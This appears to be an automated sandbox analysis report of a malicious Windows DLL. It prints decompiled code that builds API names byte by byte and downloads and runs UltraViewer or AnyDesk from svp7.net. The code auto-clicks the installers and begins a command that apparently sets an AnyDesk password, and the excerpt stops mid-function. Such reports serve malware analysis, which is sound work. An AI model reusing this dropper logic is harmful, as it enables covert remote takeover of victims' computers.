Uniqueness

Uniqueness Score: -1.00%

Function 100027E8, Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E100027E8(void* __ecx) {
				intOrPtr _v6;

				asm("sldt word [ebp-0x2]");
				return 0 | _v6 != 0x00000000;
			}

0x100027ec
0x100027fa

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828e9d74ea379652997ef74b7559f65531a49ad8f52cc2d2604c0b3615409b2e
Instruction ID: 4599ae43212c3424d11d18a8e1da04d1f99c77ebe97ac4cd200658be5afab75e
Opcode Fuzzy Hash: 828e9d74ea379652997ef74b7559f65531a49ad8f52cc2d2604c0b3615409b2e
Instruction Fuzzy Hash: 66B0120091060CB3CF043BF2880384FB7FCDE485A4B42C9948505BB080F5BCDDC04390

Uniqueness

Uniqueness Score: -1.00%

Function 10006CB5, Relevance: 245.5, APIs: 69, Strings: 71, Instructions: 458
windowsleepstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10006CB5() {
				char _t168;
				intOrPtr _t169;
				struct HWND__* _t193;
				struct HWND__* _t194;
				struct HWND__* _t213;
				struct HWND__* _t219;
				_Unknown_base(*)()* _t232;
				struct HWND__* _t243;
				struct HWND__* _t244;
				struct HWND__* _t252;
				void* _t258;
				signed int _t261;
				void* _t266;
				void* _t289;
				void* _t295;
				void* _t297;
				void* _t301;
				void* _t303;
				struct HWND__* _t306;
				struct HWND__* _t307;

				E100158AC(E1001A413, _t301);
				 *0x100273bc(0, _t301 - 0x1b8, 0x2a, 0, _t289, _t295, _t258);
				PathAddBackslashA(_t301 - 0x1b8);
				strcat(_t301 - 0x1b8, "UltraViewer");
				_t168 = "http://"; // 0x70747468
				 *(_t301 - 0xb4) = _t168;
				_t169 =  *0x100244d0; // 0x2f2f3a
				 *((intOrPtr*)(_t301 - 0xb0)) = _t169;
				_t261 = 0x12;
				memset(_t301 - 0xac, 0, _t261 << 2);
				_t306 = _t303 - 0x2b0 + 0x10;
				 *(_t301 - 0x18) = _t306;
				_push("svp7.net");
				L10015818();
				_push(_t301 - 0x64);
				E10006C44();
				_t266 = _t301 - 0x64;
				 *(_t301 - 4) = 0;
				strcat(_t301 - 0xb4, E1000865D(_t266));
				strcat(_t301 - 0xb4, ":9874/UltraViewer.exe");
				_t307 = _t306 + 0x10;
				if(PathFileExistsA(_t301 - 0x1b8) != 0) {
					_push(_t266);
					 *(_t301 - 0x18) = _t307;
					_push("uv_x64.exe");
					L10015818();
					E1000490A();
					 *(_t301 - 0x18) = _t307;
					_push("UI0Detect.exe");
					L10015818();
					E1000490A();
					 *(_t301 - 0x18) = _t307;
					_push("UltraViewer_Service.exe");
					L10015818();
					E1000490A();
					 *(_t301 - 0x18) = _t307;
					_push("UltraViewer_Desktop.exe");
					L10015818();
					E1000490A();
					PathAddBackslashA(_t301 - 0x1b8);
					strcat(_t301 - 0x1b8, "unins000.exe");
					_pop(_t273);
					if(PathFileExistsA(_t301 - 0x1b8) != 0) {
						ShellExecuteA(0, 0, _t301 - 0x1b8, 0, 0, 0);
						 *(_t301 - 0x10) = 0;
						do {
							Sleep(0x3e8);
							_t193 = FindWindowA(0, "UltraViewer Uninstall");
							if(_t193 == 0) {
								goto L17;
							} else {
								_t219 = FindWindowExA(_t193, 0, "Button", 0);
								 *(_t301 - 0x14) = _t219;
								if(_t219 != 0) {
									PostMessageA( *(_t301 - 0x14), 0x111, GetDlgCtrlID(_t219),  *(_t301 - 0x14));
									PostMessageA( *(_t301 - 0x14), 0x200, 1, 0);
									PostMessageA( *(_t301 - 0x14), 0x201, 1, 0);
									PostMessageA( *(_t301 - 0x14), 0x202, 1, 0);
								} else {
									goto L17;
								}
							}
							L20:
							 *(_t301 - 0x10) = 0;
							do {
								Sleep(0x3e8);
								_t194 = FindWindowA(0, "UltraViewer Uninstall");
								if(_t194 == 0) {
									goto L23;
								} else {
									_t213 = FindWindowExA(_t194, 0, "Button", 0);
									 *(_t301 - 0x14) = _t213;
									if(_t213 != 0) {
										PostMessageA( *(_t301 - 0x14), 0x111, GetDlgCtrlID(_t213),  *(_t301 - 0x14));
										PostMessageA( *(_t301 - 0x14), 0x200, 1, 0);
										PostMessageA( *(_t301 - 0x14), 0x201, 1, 0);
										PostMessageA( *(_t301 - 0x14), 0x202, 1, 0);
									} else {
										goto L23;
									}
								}
								L26:
								Sleep(0x7d0);
								 *(_t301 - 0x18) = _t307;
								_push("iexplore.exe");
								L10015818();
								E1000490A();
								PathRemoveFileSpecA(_t301 - 0x1b8);
								PathAddBackslashA(_t301 - 0x1b8);
								strcat(_t301 - 0x1b8, "uvh.dll");
								_pop(_t277);
								_t297 = LoadLibraryA(_t301 - 0x1b8);
								FreeLibrary(_t297);
								CloseHandle(_t297);
								Sleep(0x3e8);
								PathRemoveFileSpecA(_t301 - 0x1b8);
								 *(_t301 - 0x18) = _t307;
								_push(_t301 - 0x1b8);
								L10015818();
								E10006687();
								 *(_t301 - 0x18) = _t307;
								_push("iexplore.exe");
								L10015818();
								E1000490A();
								goto L27;
								L23:
								 *(_t301 - 0x10) =  &( *(_t301 - 0x10)->i);
							} while ( *(_t301 - 0x10) < 0x3c);
							goto L26;
							L17:
							 *(_t301 - 0x10) =  &( *(_t301 - 0x10)->i);
						} while ( *(_t301 - 0x10) < 0x3c);
						goto L20;
					} else {
						PathRemoveFileSpecA(_t301 - 0x1b8);
						_push(_t273);
						 *(_t301 - 0x18) = _t307;
						_push(_t301 - 0x1b8);
						L10015818();
						E10006687();
					}
					L27:
				} else {
					 *(_t301 - 0x40) = 0x75;
					 *((char*)(_t301 - 0x3f)) = 0x72;
					 *((char*)(_t301 - 0x3e)) = 0x6c;
					 *((char*)(_t301 - 0x3d)) = 0x6d;
					 *((char*)(_t301 - 0x3c)) = 0x6f;
					 *((char*)(_t301 - 0x3b)) = 0x6e;
					 *((char*)(_t301 - 0x3a)) = 0x2e;
					 *((char*)(_t301 - 0x39)) = 0x64;
					 *((char*)(_t301 - 0x38)) = 0x6c;
					 *((char*)(_t301 - 0x37)) = 0x6c;
					 *((char*)(_t301 - 0x36)) = 0;
					 *(_t301 - 0x60) = 0x55;
					 *((char*)(_t301 - 0x5f)) = 0x52;
					 *((char*)(_t301 - 0x5e)) = 0x4c;
					 *((char*)(_t301 - 0x5d)) = 0x44;
					 *((char*)(_t301 - 0x5c)) = 0x6f;
					 *((char*)(_t301 - 0x5b)) = 0x77;
					 *((char*)(_t301 - 0x5a)) = 0x6e;
					 *((char*)(_t301 - 0x59)) = 0x6c;
					 *((char*)(_t301 - 0x58)) = 0x6f;
					 *((char*)(_t301 - 0x57)) = 0x61;
					 *((char*)(_t301 - 0x56)) = 0x64;
					 *((char*)(_t301 - 0x55)) = 0x54;
					 *((char*)(_t301 - 0x54)) = 0x6f;
					 *((char*)(_t301 - 0x53)) = 0x46;
					 *((char*)(_t301 - 0x52)) = 0x69;
					 *((char*)(_t301 - 0x51)) = 0x6c;
					 *((char*)(_t301 - 0x50)) = 0x65;
					 *((char*)(_t301 - 0x4f)) = 0x41;
					 *((char*)(_t301 - 0x4e)) = 0;
					_t232 = GetProcAddress(LoadLibraryA(_t301 - 0x40), _t301 - 0x60);
					 *0x100273bc(0, _t301 - 0x2bc, 0x2e, 0);
					strcat(_t301 - 0x2bc, "\\UltraViewer.exe");
					_push(0);
					_push(0);
					_push(_t301 - 0x2bc);
					_push(_t301 - 0xb4);
					_push(0);
					if( *_t232() == 0 && (0 | ShellExecuteA(0, 0, _t301 - 0x2bc, 0, 0, 5) == 0x00000000) <= 0x20) {
						 *(_t301 - 0x14) = 0;
						do {
							Sleep(0x3e8);
							 *(_t301 - 0x4c) = 0x54;
							 *((char*)(_t301 - 0x4b)) = 0x57;
							 *((char*)(_t301 - 0x4a)) = 0x69;
							 *((char*)(_t301 - 0x49)) = 0x7a;
							 *((char*)(_t301 - 0x48)) = 0x61;
							 *((char*)(_t301 - 0x47)) = 0x72;
							 *((char*)(_t301 - 0x46)) = 0x64;
							 *((char*)(_t301 - 0x45)) = 0x46;
							 *((char*)(_t301 - 0x44)) = 0x6f;
							 *((char*)(_t301 - 0x43)) = 0x72;
							 *((char*)(_t301 - 0x42)) = 0x6d;
							 *((char*)(_t301 - 0x41)) = 0;
							_t243 = FindWindowA(_t301 - 0x4c, 0);
							 *(_t301 - 0x18) = _t243;
							if(_t243 == 0) {
								goto L9;
							} else {
								 *(_t301 - 0x20) = 0x26;
								 *((char*)(_t301 - 0x1f)) = 0x4e;
								 *((char*)(_t301 - 0x1e)) = 0x65;
								 *((char*)(_t301 - 0x1d)) = 0x78;
								 *((char*)(_t301 - 0x1c)) = 0x74;
								 *((char*)(_t301 - 0x1b)) = 0x20;
								 *((char*)(_t301 - 0x1a)) = 0x3e;
								 *((char*)(_t301 - 0x19)) = 0;
								_t244 = FindWindowExA(_t243, 0, 0, _t301 - 0x20);
								 *(_t301 - 0x10) = _t244;
								if(_t244 == 0) {
									 *(_t301 - 0x34) = 0x26;
									 *((char*)(_t301 - 0x33)) = 0x49;
									 *((char*)(_t301 - 0x32)) = 0x6e;
									 *((char*)(_t301 - 0x31)) = 0x73;
									 *((char*)(_t301 - 0x30)) = 0x74;
									 *((char*)(_t301 - 0x2f)) = 0x61;
									 *((char*)(_t301 - 0x2e)) = 0x6c;
									 *((char*)(_t301 - 0x2d)) = 0x6c;
									 *((char*)(_t301 - 0x2c)) = 0;
									_t244 = FindWindowExA( *(_t301 - 0x18), 0, 0, _t301 - 0x34);
									 *(_t301 - 0x10) = _t244;
									if(_t244 != 0) {
										goto L6;
									} else {
										 *(_t301 - 0x28) = 0x26;
										 *((char*)(_t301 - 0x27)) = 0x46;
										 *((char*)(_t301 - 0x26)) = 0x69;
										 *((char*)(_t301 - 0x25)) = 0x6e;
										 *((char*)(_t301 - 0x24)) = 0x69;
										 *((char*)(_t301 - 0x23)) = 0x73;
										 *((char*)(_t301 - 0x22)) = 0x68;
										 *((char*)(_t301 - 0x21)) = 0;
										_t252 = FindWindowExA( *(_t301 - 0x18), 0, 0, _t301 - 0x28);
										 *(_t301 - 0x10) = _t252;
										if(_t252 != 0) {
											PostMessageA( *(_t301 - 0x10), 0x111, GetDlgCtrlID(_t252),  *(_t301 - 0x10));
											PostMessageA( *(_t301 - 0x10), 0x200, 1, 0);
											PostMessageA( *(_t301 - 0x10), 0x201, 1, 0);
											PostMessageA( *(_t301 - 0x10), 0x202, 1, 0);
											Sleep(0x32);
										} else {
											goto L9;
										}
									}
								} else {
									L6:
									PostMessageA( *(_t301 - 0x10), 0x111, GetDlgCtrlID(_t244),  *(_t301 - 0x10));
									PostMessageA( *(_t301 - 0x10), 0x200, 1, 0);
									PostMessageA( *(_t301 - 0x10), 0x201, 1, 0);
									PostMessageA( *(_t301 - 0x10), 0x202, 1, 0);
									goto L9;
								}
							}
							goto L28;
							L9:
							 *(_t301 - 0x14) =  &( *(_t301 - 0x14)->i);
						} while ( *(_t301 - 0x14) < 0x3c);
					}
				}
				L28:
				CloseHandle( *(_t301 - 0x64));
				 *(_t301 - 4) =  *(_t301 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t301 - 0xc));
				return 0;
			}

0x10006cba
0x10006cd5
0x10006ce2
0x10006cf4
0x10006cf9
0x10006d00
0x10006d06
0x10006d0b
0x10006d11
0x10006d1a
0x10006d1c
0x10006d21
0x10006d24
0x10006d29
0x10006d31
0x10006d32
0x10006d39
0x10006d3c
0x10006d4c
0x10006d5d
0x10006d62
0x10006d74
0x10006ff9
0x10006ffc
0x10006fff
0x10007004
0x10007009
0x10007010
0x10007013
0x10007018
0x1000701d
0x10007024
0x10007027
0x1000702c
0x10007031
0x10007038
0x1000703b
0x10007040
0x10007045
0x10007052
0x10007064
0x10007070
0x1000707a
0x100070b1
0x100070b7
0x100070ba
0x100070bf
0x100070cb
0x100070de
0x00000000
0x100070e0
0x100070e8
0x100070f0
0x100070f3
0x10007113
0x10007120
0x1000712d
0x10007136
0x00000000
0x00000000
0x00000000
0x100070f3
0x10007138
0x10007138
0x1000713b
0x10007140
0x1000714c
0x10007154
0x00000000
0x10007156
0x1000715e
0x10007166
0x10007169
0x10007189
0x10007196
0x100071a3
0x100071ac
0x00000000
0x00000000
0x00000000
0x10007169
0x100071ae
0x100071b3
0x100071bc
0x100071bf
0x100071c4
0x100071c9
0x100071d6
0x100071e3
0x100071f5
0x10007201
0x10007209
0x1000720c
0x10007213
0x1000721e
0x1000722b
0x1000723a
0x1000723d
0x1000723e
0x10007243
0x1000724a
0x1000724d
0x10007252
0x10007257
0x00000000
0x1000716b
0x1000716b
0x1000716e
0x00000000
0x100070f5
0x100070f5
0x100070f8
0x00000000
0x1000707c
0x10007083
0x10007089
0x10007092
0x10007095
0x10007096
0x1000709b
0x1000709b
0x1000725c
0x10006d7a
0x10006d7d
0x10006d86
0x10006d8a
0x10006d8e
0x10006d92
0x10006d96
0x10006d9a
0x10006d9e
0x10006da2
0x10006da6
0x10006daa
0x10006dad
0x10006db1
0x10006db5
0x10006db9
0x10006dbd
0x10006dc1
0x10006dc5
0x10006dc9
0x10006dcd
0x10006dd1
0x10006dd5
0x10006dd9
0x10006ddd
0x10006de1
0x10006de5
0x10006de9
0x10006ded
0x10006df1
0x10006df5
0x10006dff
0x10006e12
0x10006e24
0x10006e31
0x10006e32
0x10006e33
0x10006e3a
0x10006e3b
0x10006e40
0x10006e6f
0x10006e77
0x10006e7c
0x10006e87
0x10006e8b
0x10006e8f
0x10006e93
0x10006e97
0x10006e9b
0x10006e9f
0x10006ea3
0x10006ea7
0x10006eab
0x10006eaf
0x10006eb3
0x10006eb6
0x10006ebe
0x10006ec1
0x00000000
0x10006ec7
0x10006eca
0x10006ed2
0x10006ed6
0x10006eda
0x10006ede
0x10006ee2
0x10006ee6
0x10006eea
0x10006eed
0x10006ef5
0x10006ef8
0x10006f37
0x10006f3e
0x10006f45
0x10006f49
0x10006f4d
0x10006f51
0x10006f55
0x10006f59
0x10006f5d
0x10006f60
0x10006f68
0x10006f6b
0x00000000
0x10006f6d
0x10006f70
0x10006f77
0x10006f7e
0x10006f82
0x10006f86
0x10006f8a
0x10006f8e
0x10006f92
0x10006f95
0x10006f9d
0x10006fa0
0x10006fc7
0x10006fd4
0x10006fe1
0x10006fea
0x10006fee
0x00000000
0x00000000
0x00000000
0x10006fa0
0x10006efa
0x10006efa
0x10006f0d
0x10006f1a
0x10006f27
0x10006f30
0x00000000
0x10006f30
0x10006ef8
0x00000000
0x10006fa2
0x10006fa2
0x10006fa5
0x10006faf
0x10006e40
0x1000725d
0x10007260
0x10007266
0x1000726d
0x10007279
0x10007282

APIs

__EH_prolog.LIBCMT ref: 10006CBA
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002A,00000000), ref: 10006CD5
PathAddBackslashA.SHLWAPI(?), ref: 10006CE2
strcat.MSVCRT(?,UltraViewer), ref: 10006CF4
#537.MFC42(svp7.net), ref: 10006D29

Part of subcall function 10006C44: __EH_prolog.LIBCMT ref: 10006C49
Part of subcall function 10006C44: WSAStartup.WS2_32(00000202,?), ref: 10006C6B
Part of subcall function 10006C44: gethostbyname.WS2_32(00000000), ref: 10006C7A
Part of subcall function 10006C44: inet_ntoa.WS2_32(?), ref: 10006C87
Part of subcall function 10006C44: #537.MFC42(00000000), ref: 10006C91
Part of subcall function 10006C44: #800.MFC42(00000000), ref: 10006CA0

strcat.MSVCRT(?,00000000), ref: 10006D4C
strcat.MSVCRT(?,:9874/UltraViewer.exe,?,00000000), ref: 10006D5D
PathFileExistsA.SHLWAPI(?), ref: 10006D6C
LoadLibraryA.KERNEL32(00000075,?), ref: 10006DF8
GetProcAddress.KERNEL32(00000000), ref: 10006DFF
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 10006E12
strcat.MSVCRT(?,\UltraViewer.exe), ref: 10006E24
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 10006E53
Sleep.KERNEL32(000003E8), ref: 10006E7C
FindWindowA.USER32 ref: 10006EB6
FindWindowExA.USER32 ref: 10006EED
GetDlgCtrlID.USER32(00000000), ref: 10006EFB
PostMessageA.USER32 ref: 10006F0D
PostMessageA.USER32 ref: 10006F1A
PostMessageA.USER32 ref: 10006F27
PostMessageA.USER32 ref: 10006F30
FindWindowExA.USER32 ref: 10006F60
FindWindowExA.USER32 ref: 10006F95
GetDlgCtrlID.USER32(00000000), ref: 10006FB5
PostMessageA.USER32 ref: 10006FC7
PostMessageA.USER32 ref: 10006FD4
PostMessageA.USER32 ref: 10006FE1
PostMessageA.USER32 ref: 10006FEA
Sleep.KERNEL32(00000032), ref: 10006FEE
#537.MFC42(uv_x64.exe), ref: 10007004
#537.MFC42(UI0Detect.exe,uv_x64.exe), ref: 10007018
#537.MFC42(UltraViewer_Service.exe,UI0Detect.exe,uv_x64.exe), ref: 1000702C
#537.MFC42(UltraViewer_Desktop.exe,UltraViewer_Service.exe,UI0Detect.exe,uv_x64.exe), ref: 10007040
PathAddBackslashA.SHLWAPI(?,UltraViewer_Service.exe,UI0Detect.exe,uv_x64.exe), ref: 10007052
strcat.MSVCRT(?,unins000.exe), ref: 10007064
PathFileExistsA.SHLWAPI(?), ref: 10007072
PathRemoveFileSpecA.SHLWAPI(?), ref: 10007083
#537.MFC42(?), ref: 10007096
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100070B1
Sleep.KERNEL32(000003E8), ref: 100070BF
FindWindowA.USER32 ref: 100070CB
FindWindowExA.USER32 ref: 100070E8
GetDlgCtrlID.USER32(00000000), ref: 10007101
PostMessageA.USER32 ref: 10007113
PostMessageA.USER32 ref: 10007120
PostMessageA.USER32 ref: 1000712D
PostMessageA.USER32 ref: 10007136
Sleep.KERNEL32(000003E8), ref: 10007140
FindWindowA.USER32 ref: 1000714C
FindWindowExA.USER32 ref: 1000715E
GetDlgCtrlID.USER32(00000000), ref: 10007177
PostMessageA.USER32 ref: 10007189
PostMessageA.USER32 ref: 10007196
PostMessageA.USER32 ref: 100071A3
PostMessageA.USER32 ref: 100071AC
Sleep.KERNEL32(000007D0), ref: 100071B3
#537.MFC42(iexplore.exe), ref: 100071C4
PathRemoveFileSpecA.SHLWAPI(?), ref: 100071D6
PathAddBackslashA.SHLWAPI(?), ref: 100071E3
strcat.MSVCRT(?,uvh.dll), ref: 100071F5
LoadLibraryA.KERNEL32(?), ref: 10007203
FreeLibrary.KERNEL32(00000000), ref: 1000720C
CloseHandle.KERNEL32(00000000), ref: 10007213
Sleep.KERNEL32(000003E8), ref: 1000721E
PathRemoveFileSpecA.SHLWAPI(?), ref: 1000722B
#537.MFC42(?), ref: 1000723E
#537.MFC42(iexplore.exe,?), ref: 10007252
CloseHandle.KERNEL32(?,?), ref: 10007260
#800.MFC42 ref: 1000726D

Strings

T, xrefs: 10006DD9
t, xrefs: 10006F4D
T, xrefs: 10006E87
n, xrefs: 10006F82
o, xrefs: 10006EA7
:9874/UltraViewer.exe, xrefs: 10006D57
unins000.exe, xrefs: 1000705E
a, xrefs: 10006F51
i, xrefs: 10006DE5
Button, xrefs: 10007157
L, xrefs: 10006DB5
&, xrefs: 10006F37
Button, xrefs: 100070E1
r, xrefs: 10006E9B
http://, xrefs: 10006CF9
R, xrefs: 10006DB1
UltraViewer Uninstall, xrefs: 100070C5
UltraViewer Uninstall, xrefs: 10007146
W, xrefs: 10006E8B
UltraViewer, xrefs: 10006CEE
d, xrefs: 10006DD5
<, xrefs: 10006FA5
UltraViewer_Service.exe, xrefs: 10007027
t, xrefs: 10006EDE
o, xrefs: 10006DCD
i, xrefs: 10006E8F
l, xrefs: 10006F59
<, xrefs: 1000716E
urlmon.dll, xrefs: 10006D82
i, xrefs: 10006F86
>, xrefs: 10006EE6
s, xrefs: 10006F49
&, xrefs: 10006ECA
e, xrefs: 10006ED6
e, xrefs: 10006DED
&, xrefs: 10006F70
N, xrefs: 10006ED2
a, xrefs: 10006E97
x, xrefs: 10006EDA
iexplore.exe, xrefs: 1000724D
UltraViewer_Desktop.exe, xrefs: 1000703B
h, xrefs: 10006F8E
z, xrefs: 10006E93
F, xrefs: 10006EA3
o, xrefs: 10006DBD
\UltraViewer.exe, xrefs: 10006E1E
F, xrefs: 10006DE1
F, xrefs: 10006F77
s, xrefs: 10006F8A
l, xrefs: 10006DC9
m, xrefs: 10006EAF
, xrefs: 10006EE2
I, xrefs: 10006F3E
uv_x64.exe, xrefs: 10006FFF
D, xrefs: 10006DB9
l, xrefs: 10006F55
w, xrefs: 10006DC1
i, xrefs: 10006F7E
n, xrefs: 10006DC5
l, xrefs: 10006DE9
uvh.dll, xrefs: 100071EF
A, xrefs: 10006DF1
d, xrefs: 10006E9F
UI0Detect.exe, xrefs: 10007013
iexplore.exe, xrefs: 100071BF
n, xrefs: 10006F45
r, xrefs: 10006EAB
U, xrefs: 10006DAD
a, xrefs: 10006DD1
svp7.net, xrefs: 10006D24
o, xrefs: 10006DDD

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: MessagePost$#537Path$FindWindow$Sleepstrcat$File$Ctrl$BackslashLibraryRemoveSpec$#800CloseExecuteExistsFolderH_prologHandleLoadShellSpecial$AddressFreeProcStartupgethostbynameinet_ntoa
String ID: $&$&$&$:9874/UltraViewer.exe$<$<$>$A$Button$Button$D$F$F$F$I$L$N$R$T$T$U$UI0Detect.exe$UltraViewer$UltraViewer Uninstall$UltraViewer Uninstall$UltraViewer_Desktop.exe$UltraViewer_Service.exe$W$\UltraViewer.exe$a$a$a$d$d$e$e$h$http://$i$i$i$i$iexplore.exe$iexplore.exe$l$l$l$l$m$n$n$n$o$o$o$o$r$r$s$s$svp7.net$t$t$unins000.exe$urlmon.dll$uv_x64.exe$uvh.dll$w$x$z
API String ID: 665782939-393442809
Opcode ID: af90a67035ad5fe55e336ea388f59ef35e3b6e90c535d19a96c1d92e548adc7a
Instruction ID: 39cc5749041eeb7fff3406d8ccdef28e1e9734d1ff44d3a15ac5d47714cd9aac
Opcode Fuzzy Hash: af90a67035ad5fe55e336ea388f59ef35e3b6e90c535d19a96c1d92e548adc7a
Instruction Fuzzy Hash: B5024A70D04299EEEF11DBA4CC89BEEBFB9EF05744F140059F144BA192CBBA5A448B61

Uniqueness

Uniqueness Score: -1.00%

Function 10007285, Relevance: 198.0, APIs: 21, Strings: 92, Instructions: 266
stringsleeplibraryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10007285() {
				char _t162;
				intOrPtr _t163;
				_Unknown_base(*)()* _t176;
				void* _t191;
				signed int _t200;
				void* _t212;
				void* _t217;
				void* _t222;
				void* _t224;
				intOrPtr _t226;

				E100158AC(E1001A425, _t222);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *0x100273bc(0, _t222 - 0x1e0, 0x2e, 0, _t212, _t217, _t191);
				strcat(_t222 - 0x1e0, "\\");
				strcat(_t222 - 0x1e0, _t222 - 0x8c);
				_t226 = _t224 - 0x2d8 + 0x10;
				if(PathFileExistsA(_t222 - 0x1e0) != 0) {
					 *((intOrPtr*)(_t222 - 0x80)) = _t226;
					_push(_t222 - 0x8c);
					L10015818();
					E1000490A();
					_pop(_t196);
					Sleep(0x3e8);
					 *((intOrPtr*)(_t222 - 0x80)) = _t226;
					_push(_t222 - 0x8c);
					L10015818();
					E1000490A();
					Sleep(0x3e8);
					DeleteFileA(_t222 - 0x1e0);
				} else {
					_t162 = "http://"; // 0x70747468
					 *(_t222 - 0xdc) = _t162;
					_t163 =  *0x100245e4; // 0x2f2f3a
					 *((intOrPtr*)(_t222 - 0xd8)) = _t163;
					_t200 = 0x12;
					memset(_t222 - 0xd4, 0, _t200 << 2);
					 *((intOrPtr*)(_t222 - 0x7c)) = _t226 + 0xc;
					L10015818();
					E10006C44();
					 *(_t222 - 4) = 0;
					strcat(_t222 - 0xdc, E1000865D(_t222 - 0x7c));
					strcat(_t222 - 0xdc, ":9874/AnyDesk.exe");
					 *(_t222 - 0x20) = 0x75;
					 *((char*)(_t222 - 0x1f)) = 0x72;
					 *((char*)(_t222 - 0x1e)) = 0x6c;
					 *((char*)(_t222 - 0x1d)) = 0x6d;
					 *((char*)(_t222 - 0x1c)) = 0x6f;
					 *((char*)(_t222 - 0x1b)) = 0x6e;
					 *((char*)(_t222 - 0x1a)) = 0x2e;
					 *((char*)(_t222 - 0x19)) = 0x64;
					 *((char*)(_t222 - 0x18)) = 0x6c;
					 *((char*)(_t222 - 0x17)) = 0x6c;
					 *((char*)(_t222 - 0x16)) = 0;
					 *(_t222 - 0x34) = 0x55;
					 *((char*)(_t222 - 0x33)) = 0x52;
					 *((char*)(_t222 - 0x32)) = 0x4c;
					 *((char*)(_t222 - 0x31)) = 0x44;
					 *((char*)(_t222 - 0x30)) = 0x6f;
					 *((char*)(_t222 - 0x2f)) = 0x77;
					 *((char*)(_t222 - 0x2e)) = 0x6e;
					 *((char*)(_t222 - 0x2d)) = 0x6c;
					 *((char*)(_t222 - 0x2c)) = 0x6f;
					 *((char*)(_t222 - 0x2b)) = 0x61;
					 *((char*)(_t222 - 0x2a)) = 0x64;
					 *((char*)(_t222 - 0x29)) = 0x54;
					 *((char*)(_t222 - 0x28)) = 0x6f;
					 *((char*)(_t222 - 0x27)) = 0x46;
					 *((char*)(_t222 - 0x26)) = 0x69;
					 *((char*)(_t222 - 0x25)) = 0x6c;
					 *((char*)(_t222 - 0x24)) = 0x65;
					 *((char*)(_t222 - 0x23)) = 0x41;
					 *((char*)(_t222 - 0x22)) = 0;
					_t176 = GetProcAddress(LoadLibraryA(_t222 - 0x20), _t222 - 0x34);
					 *0x100273bc(0, _t222 - 0x2e4, 0x2e, 0, _t222 - 0x7c, "SVP7.NET", 0);
					strcat(_t222 - 0x2e4, "\\AnyDesk.exe");
					_push(0);
					_push(0);
					_push(_t222 - 0x2e4);
					_push(_t222 - 0xdc);
					_push(0);
					if( *_t176() == 0 && (0 | ShellExecuteA(0, 0, _t222 - 0x2e4, 0, 0, 5) == 0x00000000) <= 0x20) {
						Sleep(0xbb8);
						if(E10004A35(_t222 - 0x8c) != 0) {
							 *(_t222 - 0x14) = 0x63;
							 *((char*)(_t222 - 0x13)) = 0x6d;
							 *((char*)(_t222 - 0x12)) = 0x64;
							 *((char*)(_t222 - 0x11)) = 0x2e;
							 *((char*)(_t222 - 0x10)) = 0x65;
							 *((char*)(_t222 - 0xf)) = 0x78;
							 *((char*)(_t222 - 0xe)) = 0x65;
							 *((char*)(_t222 - 0xd)) = 0;
							 *(_t222 - 0x78) = 0x2f;
							 *((char*)(_t222 - 0x77)) = 0x63;
							 *((char*)(_t222 - 0x76)) = 0x20;
							 *((char*)(_t222 - 0x75)) = 0x65;
							 *((char*)(_t222 - 0x74)) = 0x63;
							 *((char*)(_t222 - 0x73)) = 0x68;
							 *((char*)(_t222 - 0x72)) = 0x6f;
							 *((char*)(_t222 - 0x71)) = 0x20;
							 *((char*)(_t222 - 0x70)) = 0x31;
							 *((char*)(_t222 - 0x6f)) = 0x32;
							 *((char*)(_t222 - 0x6e)) = 0x33;
							 *((char*)(_t222 - 0x6d)) = 0x34;
							 *((char*)(_t222 - 0x6c)) = 0x35;
							 *((char*)(_t222 - 0x6b)) = 0x36;
							 *((char*)(_t222 - 0x6a)) = 0x7c;
							 *((char*)(_t222 - 0x69)) = 0x43;
							 *((char*)(_t222 - 0x68)) = 0x3a;
							 *((char*)(_t222 - 0x67)) = 0x5c;
							 *((char*)(_t222 - 0x66)) = 0x55;
							 *((char*)(_t222 - 0x65)) = 0x73;
							 *((char*)(_t222 - 0x64)) = 0x65;
							 *((char*)(_t222 - 0x63)) = 0x72;
							 *((char*)(_t222 - 0x62)) = 0x73;
							 *((char*)(_t222 - 0x61)) = 0x5c;
							 *((char*)(_t222 - 0x60)) = 0x50;
							 *((char*)(_t222 - 0x5f)) = 0x75;
							 *((char*)(_t222 - 0x5e)) = 0x62;
							 *((char*)(_t222 - 0x5d)) = 0x6c;
							 *((char*)(_t222 - 0x5c)) = 0x69;
							 *((char*)(_t222 - 0x5b)) = 0x63;
							 *((char*)(_t222 - 0x5a)) = 0x5c;
							 *((char*)(_t222 - 0x59)) = 0x44;
							 *((char*)(_t222 - 0x58)) = 0x6f;
							 *((char*)(_t222 - 0x57)) = 0x63;
							 *((char*)(_t222 - 0x56)) = 0x75;
							 *((char*)(_t222 - 0x55)) = 0x6d;
							 *((char*)(_t222 - 0x54)) = 0x65;
							 *((char*)(_t222 - 0x53)) = 0x6e;
							 *((char*)(_t222 - 0x52)) = 0x74;
							 *((char*)(_t222 - 0x51)) = 0x73;
							 *((char*)(_t222 - 0x50)) = 0x5c;
							 *((char*)(_t222 - 0x4f)) = 0x41;
							 *((char*)(_t222 - 0x4e)) = 0x6e;
							 *((char*)(_t222 - 0x4d)) = 0x79;
							 *((char*)(_t222 - 0x4c)) = 0x44;
							 *((char*)(_t222 - 0x4b)) = 0x65;
							 *((char*)(_t222 - 0x4a)) = 0x73;
